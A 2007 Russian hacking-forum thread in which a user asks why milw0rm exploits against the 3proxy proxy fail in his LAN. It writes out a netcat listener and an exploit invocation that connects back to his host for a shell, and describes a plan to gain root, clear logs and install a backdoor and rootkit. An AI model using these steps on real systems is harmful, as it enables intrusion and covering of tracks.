Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g (https://forum.antichat.xyz/showthread.php?t=56674)

AlterEgo 27.12.2007 04:10

Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g
 
Сам код эксплоита: h_ttp://milw0rm.com/exploits/3829
Тестил в локальное сети.
192.168.2.6 - адрес 3proxy сервера (gentoo 2007, 2.6.23)
192.168.2.3 - адрес атакующего

1. gcc exp.c -o exp
2. nc -l -p 56789
3. ./exp 192.168.2.6 3128 192.168.2.3 0
после выполнения сплоит выдает
attacker host, check it up, now!

И в итоге нихрена - нет какт молчит команды не выполняет? в чем трабл - что я делаю не так?
__________________________________________________ __
Так же пробовал другой эксплоит... h_ttp://milw0rm.com/exploits/3821

с ним таже ситуация - не работает!
И вообще в случае с этим сплоитом нужно ли выполнять nc 192.168.2.6 <забинденный порт?> или сплоит автоматом биндит, бэкконектится и предоставляет шелл?

KEZ 27.12.2007 04:17

ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!

krypt3r 27.12.2007 08:29

Вообще софт должен писаться под существующие эксплойты. Разработчики должны были на milw0rm сходить, посмотреть коды эксплойтов для их программного продукта и уже в соответствии со сплойтами писать свою программу так, чтобы сплойты работали сразу же после скачивания и хацкеру не нужно было даже лезть в исходник :)

AlterEgo 27.12.2007 08:31

Цитата:

ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!
Ну есть же в паблике эксплоиты работающие сразу! Ясно - что в исходнике этого эксплоита есть бага - Если кто знает подскажите где! Было бы очень кстати :)

AlterEgo 27.12.2007 08:34

to krypt3r:

лучше бы по существу что написал... где кривожопность сплоита убрать что бы пахал. :)

_Great_ 27.12.2007 08:56

Цитата:

Если кто знает подскажите где! Было бы очень кстати
А в чем смысл оставлять чтобы подсказывать?
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)

AlterEgo 27.12.2007 09:26

Цитата:

Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)
Да ты прав, с одной стороны! Это простая как гвоздь истина... Но помошь благое дело! К тому же когда кидисы были пробемой :) на то они и кидисы емае ...

spider-intruder 27.12.2007 10:45

>>>К тому же когда кидисы были пробемой


ВСЕГДА!!!

П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?

AlterEgo 27.12.2007 11:02

Цитата:

>>>К тому же когда кидисы были пробемой

ВСЕГДА!!!
Т.е. ты говоришь что кидисы представляют опасность :) да ну - имхо бред... Как таковой они угрозы не представляют... сам же знаешь что сплоиты почти все с багами выкладывают...:) ладно не суть!

Цитата:

П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?
ну зачем так бонально то?! :) Я вкурсе что пропатчили - итд... У меня цель другая: В универе препод дал задание - в локальной сети из 2, 3 продемонтсрировать реальный взлом... Сначала удаленно получить права(не рутовские ясно дело), потом порутать локальным эксплоитом... Почистить логи - бэкдор поставить , руткит для полноты счастья..
Local Root exploit я нашел, работает на ура через багу vixie-crond на ядре 2.6.16.15... Остаьное тоже все есть и работает как надо... Осталось только найти работающий удаленнй эксплоит под любой демон,и который возвращает шелл или биндит его хотябы...


Время: 14:58